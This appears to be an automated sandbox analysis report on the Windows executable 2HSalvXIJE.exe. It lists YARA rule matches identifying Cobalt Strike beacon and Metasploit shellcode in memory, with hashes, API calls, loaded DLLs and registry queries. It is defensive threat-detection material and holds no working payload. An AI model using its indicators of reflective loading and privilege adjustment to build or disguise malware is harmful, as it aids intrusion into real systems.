Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA1268 CreateProcessWithLogonW,GetLastError,

0_2_03AA1268

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABC3B0	0_2_03ABC3B0
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABDBF0	0_2_03ABDBF0
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA7B38	0_2_03AA7B38
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03A9A280	0_2_03A9A280
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABD280	0_2_03ABD280
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03A9DA3C	0_2_03A9DA3C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABF200	0_2_03ABF200
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB01A8	0_2_03AB01A8
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB2F9C	0_2_03AB2F9C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABCF97	0_2_03ABCF97
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA0F34	0_2_03AA0F34
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB0F74	0_2_03AB0F74
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03ABB6B0	0_2_03ABB6B0
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB1E64	0_2_03AB1E64
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA867C	0_2_03AA867C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB2528	0_2_03AB2528
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB6514	0_2_03AB6514
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03A99D6C	0_2_03A99D6C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_036B23E3	0_2_036B23E3
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_036B12AB	0_2_036B12AB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_036B196F	0_2_036B196F
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_036AF5EF	0_2_036AF5EF

Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_03AA0B70

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA3A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,

0_2_03AA3A64

Source: 2HSalvXIJE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2HSalvXIJE.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AC0198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_03AC0198

Source: 2HSalvXIJE.exe

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_0040925C push rbp; retf	0_2_0040926F
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00409274 push rbp; retf	0_2_00409277
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00409314 push rbp; retf	0_2_00409317
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_0040931C push r14; retf	0_2_00409327
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_0040922C push rsi; retf	0_2_0040922F
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00409234 push r14; retf	0_2_00409237
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092C4 push rsi; retf	0_2_004092CF
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092DC push rsp; retf	0_2_004092DF
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092E4 push rbp; retf	0_2_004092E7
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_0040929C push rbp; retf	0_2_0040929F
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092A4 push rbp; retf	0_2_00409277
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092A4 push rbp; retf	0_2_00409287
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092A4 push rbp; retf	0_2_004092B7
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092AC push rbp; retf	0_2_00409287
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092AC push rbp; retf	0_2_004092B7
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092BC push rsi; retf	0_2_004092BF
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23A8 push rbp; retf	0_2_03AC23AB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23B8 push rbp; retf	0_2_03AC23BB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23B0 push rbp; retf	0_2_03AC23B3
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2388 push rbp; retf	0_2_03AC238B
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23E8 push rsi; retf	0_2_03AC23EB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23E0 push r14; retf	0_2_03AC23E3
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23F0 push rsi; retf	0_2_03AC23FB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23C8 push r14; retf	0_2_03AC23D3
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC23C0 push rbp; retf	0_2_03AC23CB
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2328 push rbp; retf	0_2_03AC232B
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2330 push rbp; retf	0_2_03AC2333
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2318 push rbp; retf	0_2_03AC231B
